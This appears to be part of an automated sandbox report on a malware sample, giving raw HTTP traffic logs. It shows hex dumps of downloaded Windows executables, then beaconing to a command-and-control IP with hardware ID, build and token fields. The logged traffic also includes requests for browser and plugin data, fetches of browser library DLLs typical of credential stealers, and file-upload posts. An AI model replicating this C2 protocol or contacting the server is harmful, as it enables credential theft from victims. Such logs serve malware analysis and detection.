06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 32 00 00 04 00 00 8b 84 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 df 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 df 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 71 65 72 74 7a 6d 69 00 40 2b 00 00 b0 06 00 00 34 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 76 73 6e 78 75 74 74 00 10 00 00 00 f0 31 00 00 04 00 00 00 28 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 32 00 00 22 00 00 00 2c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:38:17 GMTContent-Type: application/octet-streamContent-Length: 10302976Last-Modified: Fri, 24 Jan 2025 18:07:34 GMTConnection: keep-aliveETag: "6793d6e6-9d3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 16 9d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 24 49 00 00 bc 04 00 00 00 00 00 d0 61 06 00 00 10 00 00 00 f0 94 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 a0 00 00 04 00 00 f7 da 9d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 9c 00 dc 03 00 00 00 60 a0 00 97 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9c 00 6a a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 fa 94 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 22 49 00 00 10 00 00 00 24 49 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 a8 4b 00 00 40 49 00 00 aa 4b 00 00 28 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 93 07 00 00 f0 94 00 00 9e 04 00 00 d2 94 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 90 9c 00 00 04 00 00 00 70 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6a a0 03 00 00 a0 9c 00 00 a2 03 00 00 74 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 50 a0 00 00 02 00 00 00 16 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 97 1c 00 00 00 60 a0 00 00 1e 00 00 00 18 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:38:17 GMTContent-Type: application/octet-streamContent-Length: 1828864Last-Modified: Sat, 01 Feb 2025 20:32:10 GMTConnection: keep-aliveETag: "679e84ca-1be800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 e0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6a 00 00 04 00 00 7f 7c 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 72 7a 61 72 6a 61 6b 00 50 1a 00 00 80 4f 00 00 42 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6c 71 63 65 68 61 61 00 10 00 00 00 d0 69 00 00 04 00 00 00 c2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 69 00 00 22 00 00 00 c6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:38:24 GMTContent-Type: application/octet-streamContent-Length: 3034624Last-Modified: Sat, 01 Feb 2025 20:32:21 GMTConnection: keep-aliveETag: "679e84d5-2e4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 32 00 00 04 00 00 8b 84 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 df 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 df 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 71 65 72 74 7a 6d 69 00 40 2b 00 00 b0 06 00 00 34 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 76 73 6e 78 75 74 74 00 10 00 00 00 f0 31 00 00 04 00 00 00 28 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 32 00 00 22 00 00 00 2c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCBHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 47 48 44 47 49 45 47 43 42 46 49 45 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 31 32 44 34 41 44 44 35 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 47 48 44 47 49 45 47 43 42 46 49 45 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 47 48 44 47 49 45 47 43 42 46 49 45 47 43 42 2d 2d 0d 0a Data Ascii: ------GCBGCGHDGIEGCBFIEGCBContent-Disposition: form-data; name="hwid"1712D4ADD51E2643095942------GCBGCGHDGIEGCBFIEGCBContent-Disposition: form-data; name="build"kira------GCBGCGHDGIEGCBFIEGCB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBKJECFCFBFIECBKFBHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 38 37 31 62 34 61 66 66 38 64 37 33 65 31 30 34 37 31 66 65 35 38 63 33 33 37 65 66 62 65 38 66 62 30 39 62 38 32 32 65 39 64 61 62 65 64 34 65 31 63 65 30 39 31 36 65 33 32 36 36 62 61 36 30 62 36 63 64 31 34 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 2d 2d 0d 0a Data Ascii: ------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="token"3871b4aff8d73e10471fe58c337efbe8fb09b822e9dabed4e1ce0916e3266ba60b6cd143------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="message"browsers------IIEBKJECFCFBFIECBKFB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 38 37 31 62 34 61 66 66 38 64 37 33 65 31 30 34 37 31 66 65 35 38 63 33 33 37 65 66 62 65 38 66 62 30 39 62 38 32 32 65 39 64 61 62 65 64 34 65 31 63 65 30 39 31 36 65 33 32 36 36 62 61 36 30 62 36 63 64 31 34 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 2d 2d 0d 0a Data Ascii: ------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="token"3871b4aff8d73e10471fe58c337efbe8fb09b822e9dabed4e1ce0916e3266ba60b6cd143------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="message"plugins------KJJKEBGHJKFIDGCAAFCA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGDHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 38 37 31 62 34 61 66 66 38 64 37 33 65 31 30 34 37 31 66 65 35 38 63 33 33 37 65 66 62 65 38 66 62 30 39 62 38 32 32 65 39 64 61 62 65 64 34 65 31 63 65 30 39 31 36 65 33 32 36 36 62 61 36 30 62 36 63 64 31 34 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 2d 2d 0d 0a Data Ascii: ------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="token"3871b4aff8d73e10471fe58c337efbe8fb09b822e9dabed4e1ce0916e3266ba60b6cd143------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="message"fplugins------IJEHCGIJECFIECBFIDGD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAAHost: 185.215.113.115Content-Length: 6395Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEBFBKKJDHIDHIDBAEHost: 185.215.113.115Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: 185.215.113.115Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 38 37 31 62 34 61 66 66 38 64 37 33 65 31 30 34 37 31 66 65 35 38 63 33 33 37 65 66 62 65 38 66 62 30 39 62 38 32 32 65 39 64 61 62 65 64 34 65 31 63 65 30 39 31 36 65 33 32 36 36 62 61 36 30 62 36 63 64 31 34 33 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 2d 2d 0d 0a Data Ascii: ------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="token"3871b4aff8d73e10471fe58c337efbe8fb09b822e9dabed4e1ce0916e3266ba60b6cd143------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="file"------DAEBKKKEHDHDGDGCFBKJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 38 37 31 62 34 61 66 66 38 64 37 33 65 31 30 34 37 31 66 65 35 38 63 33 33 37 65 66 62 65 38 66 62 30 39 62 38 32 32 65 39 64 61 62 65 64 34 65 31 63 65 30 39 31 36 65 33 32 36 36 62 61 36 30 62 36 63 64 31 34 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"3871b4aff8d73e10471fe58c337efbe8fb09b822e9dabed4e1ce0916e3266ba60b6cd143------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file"------CGHCFBAAAFHJDGCBFIIJ--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBFHost: 185.215.113.115Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
